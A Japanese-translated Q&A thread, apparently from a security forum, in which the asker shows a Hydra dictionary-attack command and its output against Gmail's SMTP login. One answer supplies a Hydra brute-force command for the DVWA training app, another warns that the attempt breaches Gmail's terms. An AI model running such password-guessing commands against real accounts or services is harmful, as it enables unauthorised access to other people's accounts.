web-dev-qa-db-ja.com

SMTPでヒドラを使用して自分のGmailアカウントを辞書攻撃しようとしています

自分のGmailアカウントに侵入しようとしています。しかし、それは機能していません。誰かアイデアはありますか?問題をさらに切り分けるために何かできることはありますか?仮想ボックスでKali 2016.1を実行しています。 VBでNAT=モードをオンにして、モデムに直接ハードワイヤード接続しています。以下が私が試したものです。

編集:-tフラグも1に変更しました。一度に4つのリクエストを行うのは好きではなかったかもしれません。ほぼ同じ結果。

hydra -l ********@gmail.com -P passwords.txt -s 465 -S -v -V -t 4 smtp.gmail.com smtp

これが結果です。

Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-10 16:21:32
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Google Mail has bruteforce detection and sends false positives. You are not doing anything illegal right?!
[DATA] max 4 tasks per 1 server, overall 64 tasks, 4 login tries (l:1/p:4), ~0 tries per task
[DATA] attacking service smtp on port 465 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "aaaa" - 1 of 4 [child 0]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "*******************" - 2 of 4 [child 1]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "jkjh" - 3 of 4 [child 2]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "" - 4 of 4 [child 3]
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[STATUS] attack finished for smtp.gmail.com (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-10 16:21:33
hydra
2
user21303

this site。 で脆弱なWebアプリケーションをダウンロードしてください。

その素晴らしくて自由なあなたは結果なしでそれをハックすることを試みることができます。幸運を

thisthis についても読んでください

このタイプのコマンドを使用します

hydra 192.168.88.4 -l admin -P C:\Hydra\List\Passwords\10_million_password_list_top_1000000.txt http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security;low;PHPSESSID=Paste ID here"

これは、DVWAサイトハックのサンプル行です。

3
Jonas

あなたがしていることは、 Gmail利用規約 への違反です。該当するテキスト:

サービスを誤用しないでください。たとえば、当社のサービスを妨害しないでください、または提供するインターフェイスと指示以外の方法を使用してサービスにアクセスしてみてください。当社のサービスは、適用される輸出および再輸出管理法および規制を含め、法律で許可されている場合に限ります。お客様が当社の条件またはポリシーに準拠していない場合、または違法行為の疑いがある場合は調査する場合、当社はお客様へのサービスの提供を一時停止または停止することがあります。

「自分のアカウント」をハッキングしているのではありません。この場合、GMailの認証システムをバイパスしようとしていますが、このサービスは確実にあなたのものではありません。これはせいぜいToS違反であり、最悪の場合は違法です。

3
Bradley Evans